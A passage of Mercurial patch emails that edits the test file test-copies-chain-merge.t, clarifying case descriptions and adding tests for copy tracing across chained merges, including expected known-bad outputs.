Differential Revision: https://phab.mercurial-scm.org/D10042 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -469,7 +469,7 @@ | | The current code arbitrarily pick one side - $ case_desc="simple merge" + $ case_desc="merge - G side: content change, F side: copy overwrite, no content change" $ hg up 'desc("f-2")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved @@ -491,9 +491,9 @@ $ hg ci -m "mGFm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))' - @ 29 mGFm-0 simple merge - the other way + @ 29 mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ - +---o 28 mFGm-0 simple merge - one way + +---o 28 mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way | |/ | o 25 g-1: update d | | @@ -699,10 +699,10 @@ mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way mFBm-0 simple merge - the other way - mFGm-0 simple merge - one way + mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way mGCm-0 mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way - mGFm-0 simple merge - the other way + mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way mHC-delete-before-conflict-m-0 @@ -1441,7 +1441,7 @@ #if no-changeset $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 simple merge - one way + o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ | o 25 g-1: update d | | @@ -1470,7 +1470,7 @@ #if 
no-changeset $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 simple merge - one way + o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ | o 25 g-1: update d | | @@ -1506,9 +1506,9 @@ $ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))' - o 29 mGFm-0 simple merge - the other way + o 29 mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ - +---o 28 mFGm-0 simple merge - one way + +---o 28 mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way | |/ | o 25 g-1: update d | | @@ -1584,7 +1584,7 @@ #if no-changeset $ hg log -Gfr 'desc("mFGm-0")' d - o 28 mFGm-0 simple merge - one way + o 28 mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way |\ | o 25 g-1: update d | | @@ -1610,7 +1610,7 @@ #if no-changeset $ hg log -Gfr 'desc("mGFm-0")' d - o 29 mGFm-0 simple merge - the other way + o 29 mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ | o 25 g-1: update d | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613451295 -3600 # Tue Feb 16 05:54:55 2021 +0100 # Node ID a1a06dca6941e31758bfdf7392118692dcbfa035 # Parent 2f99dedf96b10f62e45bc052c48f62de7b42676d test-copies: improve description of the G+C case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10043 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -520,6 +520,8 @@ In this case, the file keep on living after the merge. So we should not drop its copy tracing chain. 
+ $ case_desc="merge updated/deleted - revive the file (updated content)" + $ hg up 'desc("c-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("g-1")' @@ -531,7 +533,7 @@ [1] $ hg resolve -t :other d (no more unresolved files) - $ hg ci -m "mCGm-0" + $ hg ci -m "mCGm-0 $case_desc - one way" created new head $ hg up 'desc("g-1")' @@ -545,13 +547,13 @@ [1] $ hg resolve -t :local d (no more unresolved files) - $ hg ci -m "mGCm-0" + $ hg ci -m "mGCm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mCGm")+desc("mGCm"))' - @ 31 mGCm-0 + @ 31 mGCm-0 merge updated/deleted - revive the file (updated content) - the other way |\ - +---o 30 mCGm-0 + +---o 30 mCGm-0 merge updated/deleted - revive the file (updated content) - one way | |/ | o 25 g-1: update d | | @@ -693,14 +695,14 @@ mCB-revert-m-0 mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d - mCGm-0 + mCGm-0 merge updated/deleted - revive the file (updated content) - one way mCH-delete-before-conflict-m-0 mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way mFBm-0 simple merge - the other way mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way - mGCm-0 + mGCm-0 merge updated/deleted - revive the file (updated content) - the other way mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way mHC-delete-before-conflict-m-0 @@ -1647,9 +1649,9 @@ copy tracing 
chain. $ hg log -G --rev '::(desc("mCGm")+desc("mGCm"))' - o 31 mGCm-0 + o 31 mGCm-0 merge updated/deleted - revive the file (updated content) - the other way |\ - +---o 30 mCGm-0 + +---o 30 mCGm-0 merge updated/deleted - revive the file (updated content) - one way | |/ | o 25 g-1: update d | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613451502 -3600 # Tue Feb 16 05:58:22 2021 +0100 # Node ID 311a18777f45e9be069f8adc83bb34620aa5ef30 # Parent a1a06dca6941e31758bfdf7392118692dcbfa035 test-copies: improve description of the B+C "revert/restore" case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10044 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -579,13 +579,15 @@ In this case, the file keep on living after the merge. So we should not drop its copy tracing chain. + $ case_desc="merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge)" + $ hg up 'desc("c-1")' 0 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) $ hg revert --rev 'desc("b-1")' d - $ hg ci -m "mCB-revert-m-0" + $ hg ci -m "mCB-revert-m-0 $case_desc - one way" created new head $ hg up 'desc("b-1")' @@ -594,13 +596,13 @@ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) $ hg revert --rev 'desc("b-1")' d - $ hg ci -m "mBC-revert-m-0" + $ hg ci -m "mBC-revert-m-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mCB-revert-m")+desc("mBC-revert-m"))' - @ 33 mBC-revert-m-0 + @ 33 mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way |\ - +---o 32 mCB-revert-m-0 + 
+---o 32 mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way | |/ | o 6 c-1 delete d | | @@ -687,12 +689,12 @@ mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way - mBC-revert-m-0 + mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way mBCm-1 re-add d mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way mBFm-0 simple merge - one way - mCB-revert-m-0 + mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d mCGm-0 merge updated/deleted - revive the file (updated content) - one way @@ -1694,9 +1696,9 @@ copy tracing chain. 
$ hg log -G --rev '::(desc("mCB-revert-m")+desc("mBC-revert-m"))' - o 33 mBC-revert-m-0 + o 33 mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way |\ - +---o 32 mCB-revert-m-0 + +---o 32 mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way | |/ | o 6 c-1 delete d | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613451729 -3600 # Tue Feb 16 06:02:09 2021 +0100 # Node ID 60c52bdb1784579b5ee35737d8a5044cf0d4e116 # Parent 311a18777f45e9be069f8adc83bb34620aa5ef30 test-copies: improve description of the C+H case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10045 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -626,6 +626,8 @@ (the copy information from the branch that was not deleted should win). 
+ $ case_desc="simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch)" + $ hg up 'desc("i-0")' 3 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg mv b d @@ -637,19 +639,19 @@ $ hg merge 'desc("h-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m "mCH-delete-before-conflict-m-0" + $ hg ci -m "mCH-delete-before-conflict-m-0 $case_desc - one way" $ hg up 'desc("h-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("c-1")' 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m "mHC-delete-before-conflict-m-0" + $ hg ci -m "mHC-delete-before-conflict-m-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))' - @ 36 mHC-delete-before-conflict-m-0 + @ 36 mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way |\ - +---o 35 mCH-delete-before-conflict-m-0 + +---o 35 mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way | |/ | o 34 h-1: b -(move)-> d | | @@ -698,7 +700,7 @@ mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d mCGm-0 merge updated/deleted - revive the file (updated content) - one way - mCH-delete-before-conflict-m-0 + mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file 
(with different content) - the other way mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way @@ -707,7 +709,7 @@ mGCm-0 merge updated/deleted - revive the file (updated content) - the other way mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way - mHC-delete-before-conflict-m-0 + mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way Test that sidedata computations during upgrades are correct @@ -1742,9 +1744,9 @@ (the copy information from the branch that was not deleted should win). $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))' - o 36 mHC-delete-before-conflict-m-0 + o 36 mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way |\ - +---o 35 mCH-delete-before-conflict-m-0 + +---o 35 mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way | |/ | o 34 h-1: b -(move)-> d | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613648716 -3600 # Thu Feb 18 12:45:16 2021 +0100 # Node ID f8888f5c8c50b083eb4047e7458dd3d3a01389f5 # Parent 60c52bdb1784579b5ee35737d8a5044cf0d4e116 test-copies: improve description of the B+F case This will make its role clearer. 
Differential Revision: https://phab.mercurial-scm.org/D10046 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -358,7 +358,7 @@ - one with change to an unrelated file (b) - one overwriting a file (d) with a rename (from h to i to d) - $ case_desc="simple merge" + $ case_desc="simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d)" $ hg up 'desc("i-2")' 2 files updated, 0 files merged, 1 files removed, 0 files unresolved @@ -389,9 +389,9 @@ $ hg ci -m "mFBm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))' - @ 24 mFBm-0 simple merge - the other way + @ 24 mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way |\ - +---o 23 mBFm-0 simple merge - one way + +---o 23 mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way | |/ | o 22 f-2: rename i -> d | | @@ -695,7 +695,7 @@ mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way mBCm-1 re-add d mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way - mBFm-0 simple merge - one way + mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d @@ -704,7 +704,7 @@ mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way mEAm-0 merge with copies 
info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way - mFBm-0 simple merge - the other way + mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way mGCm-0 merge updated/deleted - revive the file (updated content) - the other way mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way @@ -1314,9 +1314,9 @@ - one overwriting a file (d) with a rename (from h to i to d) $ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))' - o 24 mFBm-0 simple merge - the other way + o 24 mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way |\ - +---o 23 mBFm-0 simple merge - one way + +---o 23 mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way | |/ | o 22 f-2: rename i -> d | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613652595 -3600 # Thu Feb 18 13:49:55 2021 +0100 # Node ID f01696d45d1e4bc0ca7a48410ed19ad2e5b7ecdc # Parent f8888f5c8c50b083eb4047e7458dd3d3a01389f5 test-copies: add subcase titles for various "conflicting" information variant This make the transitions between case clearer. 
Differential Revision: https://phab.mercurial-scm.org/D10047 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -312,6 +312,9 @@ Comparing with a merge with colliding rename -------------------------------------------- +Subcase: new copy information on both side +`````````````````````````````````````````` + - the "e-" branch renaming b to f (through 'g') - the "a-" branch renaming d to f (through e) @@ -353,6 +356,8 @@ o 0 i-0 initial commit: a b h +Subcase: existing copy information overwritten on one branch +```````````````````````````````````````````````````````````` Merge: - one with change to an unrelated file (b) @@ -407,6 +412,9 @@ +Subcase: reset of the copy history on one side +`````````````````````````````````````````````` + Merge: - one with change to a file - one deleting and recreating the file @@ -455,6 +463,8 @@ o 0 i-0 initial commit: a b h +Subcase: merging a change to a file with a "copy overwrite" to that file from another branch +```````````````````````````````````````````````````````````````````````````````````````````` Merge: - one with change to a file (d) @@ -1190,6 +1200,9 @@ Comparing with a merge with colliding rename -------------------------------------------- +Subcase: new copy information on both side +`````````````````````````````````````````` + - the "e-" branch renaming b to f (through 'g') - the "a-" branch renaming d to f (through e) @@ -1304,6 +1317,9 @@ R b +Subcase: existing copy information overwritten on one branch +```````````````````````````````````````````````````````````` + Note: | In this case, one of the merge wrongly record a merge while there is none. | This lead to bad copy tracing information to be dug up. 
@@ -1397,6 +1413,8 @@ ~ #endif +Subcase: reset of the copy history on one side +`````````````````````````````````````````````` Merge: - one with change to a file @@ -1502,6 +1520,8 @@ ~ #endif +Subcase: merging a change to a file with a "copy overwrite" to that file from another branch +```````````````````````````````````````````````````````````````````````````````````````````` Merge: - one with change to a file (d) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613486634 -3600 # Tue Feb 16 15:43:54 2021 +0100 # Node ID fbc466484fc3c94ba7ab64a8c8d256ced783a498 # Parent f01696d45d1e4bc0ca7a48410ed19ad2e5b7ecdc test-copies: add test chaining multiple merges Right now, the copy tracing logic take the right decision for merges, but it does not keep track of the right information about these decision and can fall into later traps. We start with highlighting this possibility by adding new tests, and we will fix them later. Check the inline test documentation for details. Differential Revision: https://phab.mercurial-scm.org/D9609 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -674,6 +674,113 @@ o 0 i-0 initial commit: a b h +Decision from previous merge are properly chained with later merge +------------------------------------------------------------------ + +Subcase: chaining conflicting rename resolution +``````````````````````````````````````````````` + +The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'f' and the arbitration done within "mAEm" and "mEA" +about that file should stay unchanged. 
+ + $ case_desc="chained merges (conflict -> simple) - same content everywhere" + +(extra unrelated changes) + + $ hg up 'desc("a-2")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ echo j > unrelated-j + $ hg add unrelated-j + $ hg ci -m 'j-1: unrelated changes (based on the "a" series of changes)' + created new head + + $ hg up 'desc("e-2")' + 2 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !) + $ echo k > unrelated-k + $ hg add unrelated-k + $ hg ci -m 'k-1: unrelated changes (based on "e" changes)' + created new head + +(merge variant 1) + + $ hg up 'desc("mAEm")' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("k-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mAE,Km: $case_desc" + +(merge variant 2) + + $ hg up 'desc("k-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + + $ hg merge 'desc("mAEm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) 
+ (branch merge, don't forget to commit) + $ hg ci -m "mK,AEm: $case_desc" + created new head + +(merge variant 3) + + $ hg up 'desc("mEAm")' + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("j-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mEA,Jm: $case_desc" + +(merge variant 4) + + $ hg up 'desc("j-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("mEAm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ hg ci -m "mJ,EAm: $case_desc" + created new head + + + $ hg log -G --rev '::(desc("mAE,Km") + desc("mK,AEm") + desc("mEA,Jm") + desc("mJ,EAm"))' + @ 42 mJ,EAm: chained merges (conflict -> simple) - same content everywhere + |\ + +---o 41 mEA,Jm: chained merges (conflict -> simple) - same content everywhere + | |/ + | | o 40 mK,AEm: chained merges (conflict -> simple) - same content everywhere + | | |\ + | | +---o 39 mAE,Km: chained merges (conflict -> simple) - same content everywhere + | | | |/ + | | | o 38 k-1: unrelated changes (based on "e" changes) + | | | | + | o | | 37 j-1: unrelated changes (based on the "a" series of changes) + | | | | + o-----+ 20 mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + |/ / / + | o / 19 mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way + |/|/ + | o 10 e-2 g -move-> f + | | + | o 9 e-1 b -move-> g + | | + o | 4 a-2: e -move-> f + | | + o | 3 a-1: d -move-> e + |/ + o 2 i-2: c -move-> d + | + o 1 i-1: a -move-> c + | + o 0 i-0 initial commit: a b h + + 
Summary of all created cases ---------------------------- @@ -698,7 +805,10 @@ i-0 initial commit: a b h i-1: a -move-> c i-2: c -move-> d + j-1: unrelated changes (based on the "a" series of changes) + k-1: unrelated changes (based on "e" changes) mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way + mAE,Km: chained merges (conflict -> simple) - same content everywhere mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way @@ -713,6 +823,7 @@ mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way + mEA,Jm: chained merges (conflict -> simple) - same content everywhere mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way @@ -720,6 +831,8 @@ mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the 
other branch) - the other way + mJ,EAm: chained merges (conflict -> simple) - same content everywhere + mK,AEm: chained merges (conflict -> simple) - same content everywhere Test that sidedata computations during upgrades are correct @@ -962,6 +1075,32 @@ 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' + ##### revision 37 ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' + added : unrelated-j, ; + ##### revision 38 ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-k' + added : unrelated-k, ; + ##### revision 39 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 40 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 41 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision 42 ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' #endif @@ -1801,3 +1940,62 @@ R a $ hg status --copies --rev 'desc("h-1")' --rev 'desc("mHC-delete-before-conflict-m")' R a + +Decision from previous merge are properly chained with later merge +------------------------------------------------------------------ + + +Subcase: chaining conflicting rename resolution +``````````````````````````````````````````````` + +The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'f' and the arbitration done within "mAEm" and "mEA" +about that file should stay unchanged. + +The result from mAEm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAEm")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE,Km")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) 
+ + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AEm")' f + A f + a (filelog !) + a (missing-correct-output sidedata !) + a (missing-correct-output upgraded !) + b (known-bad-output sidedata !) + b (known-bad-output upgraded !) + + +The result from mEAm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEAm")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA,Jm")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EAm")' f + A f + a (filelog !) + b (missing-correct-output sidedata !) + b (missing-correct-output upgraded !) + a (known-bad-output sidedata !) + a (known-bad-output upgraded !) + + # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1607964990 -3600 # Mon Dec 14 17:56:30 2020 +0100 # Node ID 3805b13ad7fe3d5f437ad5bd0cf139554a249821 # Parent fbc466484fc3c94ba7ab64a8c8d256ced783a498 test-copies: add test chaining multiple merges Right now, the copy tracing logic take the right decision for merges, but it does not keep track of the right information about these decision and can fall into later traps. We start with highlighting this possibility by adding new tests, and we will fix them later. Check the inline test documentation for details. Differential Revision: https://phab.mercurial-scm.org/D9610 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -781,6 +781,91 @@ o 0 i-0 initial commit: a b h +Subcase: chaining salvage information during a merge +```````````````````````````````````````````````````` + +We add more change on the branch were the file was deleted. merging again +should preserve the fact eh file was salvaged. 
+ + $ case_desc="chained merges (salvaged -> simple) - same content (when the file exists)" + +(creating the change) + + $ hg up 'desc("c-1")' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ echo l > unrelated-l + $ hg add unrelated-l + $ hg ci -m 'l-1: unrelated changes (based on "c" changes)' + created new head + +(Merge variant 1) + + $ hg up 'desc("mBC-revert-m")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("l-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mBC+revert,Lm: $case_desc" + +(Merge variant 2) + + $ hg up 'desc("mCB-revert-m")' + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("l-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mCB+revert,Lm: $case_desc" + +(Merge variant 3) + + $ hg up 'desc("l-1")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + + $ hg merge 'desc("mBC-revert-m")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mL,BC+revertm: $case_desc" + created new head + +(Merge variant 4) + + $ hg up 'desc("l-1")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + + $ hg merge 'desc("mCB-revert-m")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mL,CB+revertm: $case_desc" + created new head + + $ hg log -G --rev '::(desc("mBC+revert,Lm") + desc("mCB+revert,Lm") + desc("mL,BC+revertm") + desc("mL,CB+revertm"))' + @ 47 mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + |\ + | | o 46 mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + | |/| + +-+---o 45 mCB+revert,Lm: chained merges (salvaged -> 
simple) - same content (when the file exists) + | | | + | +---o 44 mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + | | |/ + | o | 43 l-1: unrelated changes (based on "c" changes) + | | | + | | o 33 mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + | |/| + o---+ 32 mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + |/ / + o | 6 c-1 delete d + | | + | o 5 b-1: b update + |/ + o 2 i-2: c -move-> d + | + o 1 i-1: a -move-> c + | + o 0 i-0 initial commit: a b h + + + + Summary of all created cases ---------------------------- @@ -807,15 +892,18 @@ i-2: c -move-> d j-1: unrelated changes (based on the "a" series of changes) k-1: unrelated changes (based on "e" changes) + l-1: unrelated changes (based on "c" changes) mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way mAE,Km: chained merges (conflict -> simple) - same content everywhere mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way + mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way mBCm-1 re-add d mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) mCB-revert-m-0 merge explicitely revive deleted file - B 
